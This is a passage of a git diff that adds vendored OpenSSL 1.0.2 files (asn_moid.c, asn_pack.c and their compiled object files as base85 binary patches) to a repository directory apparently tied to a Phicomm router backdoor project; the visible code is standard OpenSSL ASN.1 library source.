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

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/asn_moid.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/asn_moid.c
new file mode 100644
index 0000000..fab2dd9
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/asn_moid.c
@@ -0,0 +1,153 @@
+/* asn_moid.c */
+/*
+ * Written by Stephen Henson (steve@openssl.org) for the OpenSSL project
+ * 2001.
+ */
+/* ====================================================================
+ * Copyright (c) 2001-2004 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include <stdio.h>
+#include <ctype.h>
+#include <openssl/crypto.h>
+#include "cryptlib.h"
+#include <openssl/conf.h>
+#include <openssl/dso.h>
+#include <openssl/x509.h>
+
+/* Simple ASN1 OID module: add all objects in a given section */
+
+static int do_create(char *value, char *name);
+
+static int oid_module_init(CONF_IMODULE *md, const CONF *cnf)
+{
+    int i;
+    const char *oid_section;
+    STACK_OF(CONF_VALUE) *sktmp;
+    CONF_VALUE *oval;
+    oid_section = CONF_imodule_get_value(md);
+    if (!(sktmp = NCONF_get_section(cnf, oid_section))) {
+        ASN1err(ASN1_F_OID_MODULE_INIT, ASN1_R_ERROR_LOADING_SECTION);
+        return 0;
+    }
+    for (i = 0; i < sk_CONF_VALUE_num(sktmp); i++) {
+        oval = sk_CONF_VALUE_value(sktmp, i);
+        if (!do_create(oval->value, oval->name)) {
+            ASN1err(ASN1_F_OID_MODULE_INIT, ASN1_R_ADDING_OBJECT);
+            return 0;
+        }
+    }
+    return 1;
+}
+
+static void oid_module_finish(CONF_IMODULE *md)
+{
+    OBJ_cleanup();
+}
+
+void ASN1_add_oid_module(void)
+{
+    CONF_module_add("oid_section", oid_module_init, oid_module_finish);
+}
+
+/*-
+ * Create an OID based on a name value pair. Accept two formats.
+ * shortname = 1.2.3.4
+ * shortname = some long name, 1.2.3.4
+ */
+
+static int do_create(char *value, char *name)
+{
+    int nid;
+    ASN1_OBJECT *oid;
+    char *ln, *ostr, *p, *lntmp;
+    p = strrchr(value, ',');
+    if (!p) {
+        ln = name;
+        ostr = value;
+    } else {
+        ln = NULL;
+        ostr = p + 1;
+        if (!*ostr)
+            return 0;
+        while (isspace((unsigned char)*ostr))
+            ostr++;
+    }
+
+    nid = OBJ_create(ostr, name, ln);
+
+    if (nid == NID_undef)
+        return 0;
+
+    if (p) {
+        ln = value;
+        while (isspace((unsigned char)*ln))
+            ln++;
+        p--;
+        while (isspace((unsigned char)*p)) {
+            if (p == ln)
+                return 0;
+            p--;
+        }
+        p++;
+        lntmp = OPENSSL_malloc((p - ln) + 1);
+        if (lntmp == NULL)
+            return 0;
+        memcpy(lntmp, ln, p - ln);
+        lntmp[p - ln] = 0;
+        oid = OBJ_nid2obj(nid);
+        oid->ln = lntmp;
+    }
+
+    return 1;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/asn_moid.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/asn_moid.o
new file mode 100644
index 0000000000000000000000000000000000000000..d94143738fff6127a027d03cae523575132d4d45
GIT binary patch
literal 3016
zcmbtWO>7%g5Ppu6#ue>46j~w*l}|JUy7H#2NDv^e9VZ)PB_TgR3t_dfw~eX)Sg%7u
zD;gAxSVGcD<$#352^ArJPAGyNiq+7h2#EvYf)E!3BEf1Atw5+kEHk_BCC^)%1B~=`
z=6&y*nfE*Psd%Ed$>$?XeB=?b*<&anN?_BDIA(+hWIMSY+;d|c`)J5d$dAio^5~di
z{XX*88p4Y8t75IVX1Nk9zYSPisz_g){{XD&Nu~T<u>2mFvVAFG{p=8Xy4Qk>0hmRP
zb(LWk?#E#BlWmFlLI8r&;LA$6Vvf&F`-r($S(x?(ms+ihb8B1Y{%oF-XK#eehor9)
z)*lXAwpPoP(xRLFeF%5qBlvu_9X`&uR9Sx$?0)O>xO8PbZ`-zFuU0>VWC`n9^;3ve
zx?8a?1()K4<#_&=>J`M>mG1A&bHSw;xO}-W_)~RFv6s)EhM>yAA@~wyUv=Sx&&k$r
zt-#!aFK022wW?TG73<sU@2oVp!?JCMlCTPa^&kJX?N9JTjyyFkKP`{T&&cXBZnm<p
z^AwCh<d+=vFeY%0LM!IfY(AY5lLWqMQBRube2$R5SnR=2$Jj(EXO=?U;sG(dUwWYA
zbfp(N!(#a0J{N{S&CuGQwLt3|7$Z%DR1ot+L%H2m#P`B5@lCh+c5iD9oPlYg&s}tE
zE7c0<FtxL|lwP6jbW>DlU-U<X&_Z)m=y<(F7Q(M==@Gi-T4f>PAMy!ZfXG4zFn}2q
z+M+@LTruxS8fy>L|E4fqGx^P~$MM&_>9|I=%33eKvn#dOHt05SaoC!X<#%?kmXC8r
zKI1w2K`DOHT1(!*apgCQe<RA~nCO^zYPE8}>9&wtYGJ46CtGepy8ywn^vVDL_3$GN
z@aG!fa}Ds<8sKLe;BPg+&o#h5Zh&8GfPV$}4mhtVyhtGI&iw#(y?r2_$Cu5gN*P@}
zn$D$*lg@Lb2mmG#6R|LUB%<~u2BUI99qjELiI1wIax@WF$zb$RHJQ=1T&X}}g9E*4
zntC78O?67klyoxS;MiyHym(yAm9hks%P5+Lk(@N#V1}-lI*AVttA&!O>V}awNNo7<
z(CDC=)iRlU(xK(jsm}bwvqT;lkW?*|Qn8M>soi<dX~2-PE1Peg)s4TPtfB0s<A~o1
zjp0KazJtSAJmlZT;WHc`YXFP$E{E^r@Kp}q#o_nTbA)>4yag8L5XCX?9UT8j4sYl1
zc`gpt02YV6Jd6|MaIB3eh~Ei~@k3yv;C!$#IY<qLvwAV>!P&heVsR#GY7?MM!_||_
zGW3iln))={x0GgTM4TuViD=}pgLFxhh?vZ0vw99FxxA^1Q1bT|O)Ytx_K)RCV!_B4
zbi<qhR}836sz(hitFsyZKOF*h+#+u!iU5Z42Hiim=W>~idN(xO+XysX6dJIL`eXe=
zlT}naQ<Qt4A?~gG-+1yO7sU(X-xG}aU;QN-vlBEgEI-~!URZvnBQS_|m?wc<rG)!D
zIP+t=AI6!@Q+M%~k{j@H55pM#dU@&X6bNy?XtMohF#b+pOs{_z1<o)c)n5M$;PuXb
z7AFOwxXO9+_?DPIJO6sQ(d9DD|0>n^)`dF$7}I<90FfbD5Uyc|6Yu_EZLH^ina=+N
J=ZmJ-{~um-)o=g+

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/asn_pack.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/asn_pack.c
new file mode 100644
index 0000000..366caf0
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/asn_pack.c
@@ -0,0 +1,207 @@
+/* asn_pack.c */
+/*
+ * Written by Dr Stephen N Henson (steve@openssl.org) for the OpenSSL project
+ * 1999.
+ */
+/* ====================================================================
+ * Copyright (c) 1999 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+#include <openssl/asn1.h>
+
+#ifndef NO_ASN1_OLD
+
+/* ASN1 packing and unpacking functions */
+
+/* Turn an ASN1 encoded SEQUENCE OF into a STACK of structures */
+
+STACK_OF(OPENSSL_BLOCK) *ASN1_seq_unpack(const unsigned char *buf, int len,
+                                         d2i_of_void *d2i,
+                                         void (*free_func) (OPENSSL_BLOCK))
+{
+    STACK_OF(OPENSSL_BLOCK) *sk;
+    const unsigned char *pbuf;
+    pbuf = buf;
+    if (!(sk = d2i_ASN1_SET(NULL, &pbuf, len, d2i, free_func,
+                            V_ASN1_SEQUENCE, V_ASN1_UNIVERSAL)))
+        ASN1err(ASN1_F_ASN1_SEQ_UNPACK, ASN1_R_DECODE_ERROR);
+    return sk;
+}
+
+/*
+ * Turn a STACK structures into an ASN1 encoded SEQUENCE OF structure in a
+ * OPENSSL_malloc'ed buffer
+ */
+
+unsigned char *ASN1_seq_pack(STACK_OF(OPENSSL_BLOCK) *safes, i2d_of_void *i2d,
+                             unsigned char **buf, int *len)
+{
+    int safelen;
+    unsigned char *safe, *p;
+    if (!(safelen = i2d_ASN1_SET(safes, NULL, i2d, V_ASN1_SEQUENCE,
+                                 V_ASN1_UNIVERSAL, IS_SEQUENCE))) {
+        ASN1err(ASN1_F_ASN1_SEQ_PACK, ASN1_R_ENCODE_ERROR);
+        return NULL;
+    }
+    if (!(safe = OPENSSL_malloc(safelen))) {
+        ASN1err(ASN1_F_ASN1_SEQ_PACK, ERR_R_MALLOC_FAILURE);
+        return NULL;
+    }
+    p = safe;
+    i2d_ASN1_SET(safes, &p, i2d, V_ASN1_SEQUENCE, V_ASN1_UNIVERSAL,
+                 IS_SEQUENCE);
+    if (len)
+        *len = safelen;
+    if (buf)
+        *buf = safe;
+    return safe;
+}
+
+/* Extract an ASN1 object from an ASN1_STRING */
+
+void *ASN1_unpack_string(ASN1_STRING *oct, d2i_of_void *d2i)
+{
+    const unsigned char *p;
+    char *ret;
+
+    p = oct->data;
+    if (!(ret = d2i(NULL, &p, oct->length)))
+        ASN1err(ASN1_F_ASN1_UNPACK_STRING, ASN1_R_DECODE_ERROR);
+    return ret;
+}
+
+/* Pack an ASN1 object into an ASN1_STRING */
+
+ASN1_STRING *ASN1_pack_string(void *obj, i2d_of_void *i2d, ASN1_STRING **oct)
+{
+    unsigned char *p;
+    ASN1_STRING *octmp;
+
+    if (!oct || !*oct) {
+        if (!(octmp = ASN1_STRING_new())) {
+            ASN1err(ASN1_F_ASN1_PACK_STRING, ERR_R_MALLOC_FAILURE);
+            return NULL;
+        }
+        if (oct)
+            *oct = octmp;
+    } else
+        octmp = *oct;
+
+    if (!(octmp->length = i2d(obj, NULL))) {
+        ASN1err(ASN1_F_ASN1_PACK_STRING, ASN1_R_ENCODE_ERROR);
+        goto err;
+    }
+    if (!(p = OPENSSL_malloc(octmp->length))) {
+        ASN1err(ASN1_F_ASN1_PACK_STRING, ERR_R_MALLOC_FAILURE);
+        goto err;
+    }
+    octmp->data = p;
+    i2d(obj, &p);
+    return octmp;
+ err:
+    if (!oct || !*oct) {
+        ASN1_STRING_free(octmp);
+        if (oct)
+            *oct = NULL;
+    }
+    return NULL;
+}
+
+#endif
+
+/* ASN1_ITEM versions of the above */
+
+ASN1_STRING *ASN1_item_pack(void *obj, const ASN1_ITEM *it, ASN1_STRING **oct)
+{
+    ASN1_STRING *octmp;
+
+    if (!oct || !*oct) {
+        if (!(octmp = ASN1_STRING_new())) {
+            ASN1err(ASN1_F_ASN1_ITEM_PACK, ERR_R_MALLOC_FAILURE);
+            return NULL;
+        }
+        if (oct)
+            *oct = octmp;
+    } else
+        octmp = *oct;
+
+    if (octmp->data) {
+        OPENSSL_free(octmp->data);
+        octmp->data = NULL;
+    }
+
+    if (!(octmp->length = ASN1_item_i2d(obj, &octmp->data, it))) {
+        ASN1err(ASN1_F_ASN1_ITEM_PACK, ASN1_R_ENCODE_ERROR);
+        return NULL;
+    }
+    if (!octmp->data) {
+        ASN1err(ASN1_F_ASN1_ITEM_PACK, ERR_R_MALLOC_FAILURE);
+        return NULL;
+    }
+    return octmp;
+}
+
+/* Extract an ASN1 object from an ASN1_STRING */
+
+void *ASN1_item_unpack(ASN1_STRING *oct, const ASN1_ITEM *it)
+{
+    const unsigned char *p;
+    void *ret;
+
+    p = oct->data;
+    if (!(ret = ASN1_item_d2i(NULL, &p, oct->length, it)))
+        ASN1err(ASN1_F_ASN1_ITEM_UNPACK, ASN1_R_DECODE_ERROR);
+    return ret;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/asn_pack.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/asn1/asn_pack.o
new file mode 100644
index 0000000000000000000000000000000000000000..4f923c87ea1a3f9718e9fb722113c1b2f0db51bb
GIT binary patch
literal 4240
zcmbtWUu+ab7@yu<=^4s!B}ES_<dD;xQ8u>)L&1dHUVH6cvht^YG$6RSwg(j2yK>!&
zR1p%IBAZfaeDKKx5`FN|HzN;N16qkO0Sv}O6EPuz7A=1Q2}E*!-|S3pZo3Tzzhri1
ze)IkRzMb8}DWla_RYe3<k&UFh6DT2}MdfvZEfa*2MdZ%n6%X{08?m%~N$>eFZGYRV
zj|HBK0f%n4M8oQ&K5j)rx_vMjGVF`m7a=%NOI!Am>!@V=HhpxmxGJSis^?GV0623P
